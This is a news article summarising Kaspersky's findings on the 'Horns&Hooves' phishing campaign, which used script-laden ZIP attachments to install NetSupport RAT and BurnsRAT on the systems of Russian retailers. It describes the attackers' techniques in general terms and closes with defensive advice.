Russian Cybercriminal Campaign Targets Retailers with Advanced Malware Tactics
A recent malware campaign has been launched against retailers and service providers in Russia, marking a significant upsurge in cybercriminal activity since March 2023. According to cybersecurity firm Kaspersky, this operation aims to infiltrate targeted organizations through sophisticated remote access tools and information-stealing malware.
The threat actor behind this campaign, identified as TA569—also known as Mustard Tempest and Gold Prelude—exploits phishing tactics to gain initial access. By sending emails that impersonate legitimate requests for quotes or proposals, the adversaries embed harmful scripts within ZIP file attachments. These scripts, often written in JavaScript or HTA formats, are designed to bypass security measures and deploy malicious payloads upon execution.
Kaspersky has branded this operation the "Horns&Hooves" campaign, referencing a fictional organization from the 1931 Soviet satirical novel The Little Golden Calf. This name aptly reflects the con artistry employed by the attackers, who have successfully targeted over 1,000 victims in Russia. The attackers primarily deploy remote access trojans (RATs) such as NetSupport RAT and BurnsRAT through the compromised correspondence. The phishing emails are crafted to mimic genuine communication, using filenames like "Request for Price and Proposal" or "Letter of Claim" to bolster legitimacy.
Upon executing the malicious payloads, victims unwittingly install NetSupport Manager, which is weaponized to enable remote control by the attackers. This approach not only compromises the victim’s system but also provides a gateway for further exploitation, as the attackers can deploy additional information-gathering malware like Rhadamanthys and Meduza.
In the campaign’s early stages, attackers employed HTA scripts that fetched decoy files alongside malicious components, cleverly distracting victims from the underlying threat. As the campaign evolved, newer variants incorporated JavaScript files that utilized intermediary scripts to download a range of additional malicious tools, enhancing their operational capabilities.
One incident of note involved the use of an HTML Application file that, when activated, fetched a decoy image while simultaneously executing a secondary script via the BITSAdmin tool. This script initiated the download of the NetSupport RAT, establishing communication with the attacker’s command-and-control server, thereby facilitating ongoing access to the compromised system.
The malware is strategically stored in inconspicuous directories such as %APPDATA%VCRuntimeSync, ensuring persistence through autorun registry entries. BurnsRAT, a more sophisticated variant of the Remote Manipulator System, supports functionalities like remote desktop connections, command execution, and file transfers. It employs encryption methods, including the RC4 algorithm, to secure communications with command-and-control servers during data exfiltration.
Given the tactical sophistication observed in this campaign, business owners should be acutely aware of the potential risks. The methods employed, aligning with MITRE ATT&CK techniques such as initial access through phishing emails, persistence via autorun entries, and privilege escalation through remote access tools, underscore the pressing need for enhanced cybersecurity measures. Proactive vigilance and robust security protocols are vital in defending against such evolving cyber threats.
